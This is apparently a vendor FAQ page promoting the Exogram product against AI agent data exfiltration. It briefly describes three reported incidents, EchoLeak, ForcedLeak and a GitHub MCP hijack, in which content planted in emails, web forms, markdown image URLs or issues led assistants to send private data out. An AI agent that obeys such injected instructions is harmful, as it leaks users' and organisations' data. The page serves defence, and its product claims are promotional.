How do I prevent AI agent data exfiltration?

AI agents can exfiltrate data through tool calls, API requests, and even markdown-rendered images — and legacy DLP tools cannot detect these vectors. Traditional Data Loss Prevention was designed for human-driven workflows: email attachments, USB drives, file uploads. AI agents operate differently — they exfiltrate through function calls, embedded URLs, and cross-system data flows at machine speed.

Documented exfiltration incidents include:

• EchoLeak (CVE-2025-32711): Zero-click data exfiltration through Microsoft 365 Copilot via crafted emails
• ForcedLeak (Salesforce): Hidden prompts in web forms exfiltrated customer data via markdown image URLs
• GitHub MCP Data Heist (May 2025): Malicious GitHub issue hijacked an AI assistant and accessed private repositories

The pattern is always the same: indirect prompt injection tricks the agent into including sensitive data in outbound requests. The agent doesn't know it's being exploited — it believes it's following instructions.

Exogram prevents exfiltration at the execution boundary. Every outbound action — API calls, database queries, file operations — is inspected against deterministic policy rules. PII is detected and scrubbed before storage (the PII Air Gap invariant). Namespace isolation prevents cross-tenant data access. Even if injection succeeds at the model level, the exfiltration attempt is blocked at the infrastructure level.